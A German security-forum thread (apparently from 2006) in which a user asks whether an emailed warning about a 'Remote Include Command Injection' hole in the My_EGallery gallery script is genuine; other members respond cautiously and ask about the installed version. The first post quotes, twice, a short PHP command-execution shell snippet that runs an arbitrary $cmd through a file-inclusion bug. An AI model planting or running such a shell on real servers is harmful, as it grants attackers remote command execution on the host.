[HaBo]

M-H · 21.01.06, 21:05

hi

ich hab heute eine e-mail bekommen von jemandem der behauptet dass My_EGallery eine Sicherheitslücke hat.

er hat gesagt, dass die lücke ein "Remote Include Command Injection" ist. und ich musste ne Update für den script von My_EGallery machen, oder den Fehler korrigieren.

Code:

> <?
>   // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
>   if (isset($chdir)) @chdir($chdir);
>   ob_start();
>   execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");

>   $output = ob_get_contents();
>   ob_end_clean();
>   print_output();
> ?>

soll ich mir Sorgen machen? gibt's diesen Fehler wirklich? :-\

Danke schon mal für die Antwort !

BasicAvid · 22.01.06, 12:19

Hallo,

es gibt Sicherheitslücken bei My_EGallery, aber diese, habe ich nicht gefunden. Der Code den Du gepostet hast, ist das der Code den Du einbauen solltest?
Kennst Du die Person die Dir die EMail-Adresse gesendet hast?

Schau doch mal bei Heise-Security vorbei!

Anzeige

- Anzeige -

M-H · 22.01.06, 13:42

danke BasicAvid für die Antwort.

die Sache ist schon gereglt. ich hab in einem nuke-forum gefragt. die sagen dass das Fehler seit 2 Jahren nicht mehr gibt.

ich wusste auch nicht, was ich mit dem Code machen soll

und die Person die mir die e-mail gesendet hat, hat sich als "white Hacker" vorgestellt.

**Mackz** · 22.01.06, 13:46

Zitat:

Original von M-H
die Sache ist schon gereglt. ich hab in einem nuke-forum gefragt. die sagen dass das Fehler seit 2 Jahren nicht mehr gibt.

Du verwendest aber nicht vielleicht eine 2 Jahre alte Version!?

M-H · 22.01.06, 15:02

ich hoffe, dass das nicht der Fall ist

ich hab erst vor 6 Monate meine My_EGallery installiert, ich denke, die war die actuelle Version

Anzeige

- Anzeige -

21.01.06, 21:05	#1 (permalink)
M-H Registriert seit: 20.11.05 Likes: 0	Sicherheitslücke in My_EGallery ? Anzeige hi ich hab heute eine e-mail bekommen von jemandem der behauptet dass My_EGallery eine Sicherheitslücke hat. er hat gesagt, dass die lücke ein "Remote Include Command Injection" ist. und ich musste ne Update für den script von My_EGallery machen, oder den Fehler korrigieren. Code: > <? > // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) > if (isset($chdir)) @chdir($chdir); > ob_start(); > execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); > $output = ob_get_contents(); > ob_end_clean(); > print_output(); > ?> soll ich mir Sorgen machen? gibt's diesen Fehler wirklich? :-\ Danke schon mal für die Antwort !

22.01.06, 12:19	#2 (permalink)
BasicAvid Registriert seit: 17.03.04 Likes: 2	Hallo, es gibt Sicherheitslücken bei My_EGallery, aber diese, habe ich nicht gefunden. Der Code den Du gepostet hast, ist das der Code den Du einbauen solltest? Kennst Du die Person die Dir die EMail-Adresse gesendet hast? Schau doch mal bei Heise-Security vorbei! __________________ Mfg Basic Avid - Use it or be used! -

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
sicherheitslücke in norton?	obispo	(In)security allgemein	6	01.11.05 22:35
Potentielle Sicherheitslücke in Mac OS 10.4	mise	Mac OS & Co.	4	11.05.05 19:51
Sicherheitslücke	fux0red	Virenschutz · Tools & Aggressive Software	15	23.05.04 00:02
Sicherheitslücke in PGP	Tec	News & Ankündigungen	0	07.09.02 03:39

22.01.06, 13:42	#3 (permalink)
M-H Themenstarter Registriert seit: 20.11.05 Likes: 0	danke BasicAvid für die Antwort. die Sache ist schon gereglt. ich hab in einem nuke-forum gefragt. die sagen dass das Fehler seit 2 Jahren nicht mehr gibt. ich wusste auch nicht, was ich mit dem Code machen soll und die Person die mir die e-mail gesendet hat, hat sich als "white Hacker" vorgestellt.

22.01.06, 15:02	#5 (permalink)
M-H Themenstarter Registriert seit: 20.11.05 Likes: 0	ich hoffe, dass das nicht der Fall ist ich hab erst vor 6 Monate meine My_EGallery installiert, ich denke, die war die actuelle Version

[HaBo]

Sicherheitslücke in My_EGallery ?